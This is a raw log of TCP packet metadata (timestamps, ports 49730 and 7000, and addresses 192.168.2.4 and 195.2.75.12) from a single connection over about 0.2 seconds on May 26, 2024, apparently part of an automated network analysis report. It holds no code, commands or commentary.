May 26, 2024 01:21:24.568517923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.569122076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.569158077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.569192886 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.569238901 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.569297075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.569403887 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.569545031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.569602013 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.570094109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.570172071 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.570234060 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.570287943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.571069956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.571144104 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.571202040 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.571280956 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.571316957 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.571336985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.572035074 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.572096109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.572118044 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.572153091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.572206020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.572225094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.573043108 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.573100090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.573106050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.573230982 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.573348999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.573406935 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.574284077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.574397087 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.574449062 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.574512959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.574673891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.574714899 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.574975014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.575012922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.575073004 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.575258017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.575294018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.575313091 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.575932026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.575998068 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.576018095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.576051950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.576138020 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.576142073 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.576919079 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.576973915 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.576978922 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.577142000 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.577176094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.577204943 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.577899933 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.577943087 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.577980042 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.578079939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.578152895 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.579041004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579077005 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579129934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.579257011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579359055 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579415083 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.579466105 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579859972 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579896927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.579957962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.584129095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.584188938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.584443092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.611020088 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.611221075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.625777006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.625870943 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.625921965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.625988960 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.625988007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.626028061 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.626055002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.626076937 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.626856089 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.626933098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.627091885 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.627136946 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.627155066 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.627171040 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.627240896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.627294064 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.627368927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.628011942 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.628104925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.628175974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.628314018 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.628350973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.628417969 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.628926992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.629028082 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.629062891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.629096985 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.629159927 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.629270077 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.629889011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.629983902 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.630038977 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.630183935 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.630219936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.630302906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.630526066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.630867958 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.630990982 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.630995989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.631047964 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.631114006 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.631844997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.631925106 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632042885 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.632106066 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632141113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632318974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.632776022 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632874966 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632910013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.632955074 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.632986069 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633091927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.633547068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633625031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633814096 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633831024 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.633850098 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633884907 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.633945942 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.635301113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.635432005 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.640228033 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.655607939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.655680895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.655791998 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.655827045 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.655911922 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.655931950 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.656107903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.656172037 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.656310081 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.656451941 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.656512976 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.657054901 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.657092094 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.657141924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.657174110 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.657362938 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.657398939 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.657459974 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.658052921 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.658121109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.658135891 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.658313990 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.658350945 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.658407927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.659027100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.659064054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.659097910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.659100056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.659249067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.659255981 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.660078049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.660115004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.660209894 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.660309076 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.660346985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.660365105 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.660609961 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.660681009 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.660959959 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.661029100 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.661098003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.661149979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.661885977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.661946058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.661978006 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.662137985 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.662173986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.662209034 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.662857056 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.662940025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.662976980 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.663002968 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.663032055 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.663053989 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.663810968 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.663846016 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.663877010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.664041042 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.664076090 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.664105892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.665728092 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.665790081 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.666011095 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666090965 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666150093 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.666232109 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666349888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666431904 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.666477919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666613102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.666702032 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.667256117 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.667290926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.667332888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.667382002 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.667444944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.667542934 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.667589903 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.668206930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.668287992 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.668291092 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.668427944 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.668488026 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.668540001 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669256926 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669291019 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669317007 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.669326067 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669392109 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.669471979 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669508934 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.669578075 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.670207977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.670243025 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.670277119 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.670334101 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.670452118 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.670514107 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.670561075 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.671205997 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.671267033 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.675548077 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.718427896 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.718523026 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.718561888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.718631983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.718631983 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.718981028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719089031 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719125986 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719273090 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.719816923 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719901085 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719933987 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.719969034 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.720029116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.720029116 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.720129967 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.720268965 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.720446110 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.720537901 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.720618963 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.720681906 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.721077919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.721179008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.721188068 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.721199036 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.721335888 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.721354008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.722060919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.722125053 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.722148895 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.722337008 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.722373009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.722409010 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.723002911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723072052 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.723099947 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723254919 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723342896 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.723403931 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723438978 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723648071 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.723964930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.723999977 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.724061966 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.724160910 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.724912882 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.724971056 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.725004911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.725145102 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.725179911 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.725238085 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.725852013 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.725949049 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.725985050 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.726070881 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.726260900 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.726838112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.726901054 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.726939917 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.726998091 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.727049112 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.728163004 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.746803045 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.746860981 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747030020 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747034073 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.747087002 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747123003 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.747189999 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747226954 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747309923 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.747494936 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747530937 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.747567892 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.748183012 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748222113 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748250008 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.748255014 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748342991 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748400927 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.748476028 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748512030 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.748570919 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.749094009 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.749157906 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.749205112 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.749341011 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.749381065 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.749444962 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.750052929 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750088930 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750140905 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750148058 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.750195980 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.750294924 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750330925 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750365973 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.750385046 CEST	49730	7000	192.168.2.4	195.2.75.12
May 26, 2024 01:21:24.751487017 CEST	7000	49730	195.2.75.12	192.168.2.4
May 26, 2024 01:21:24.751564026 CEST	49730	7000	192.168.2.4	195.2.75.12
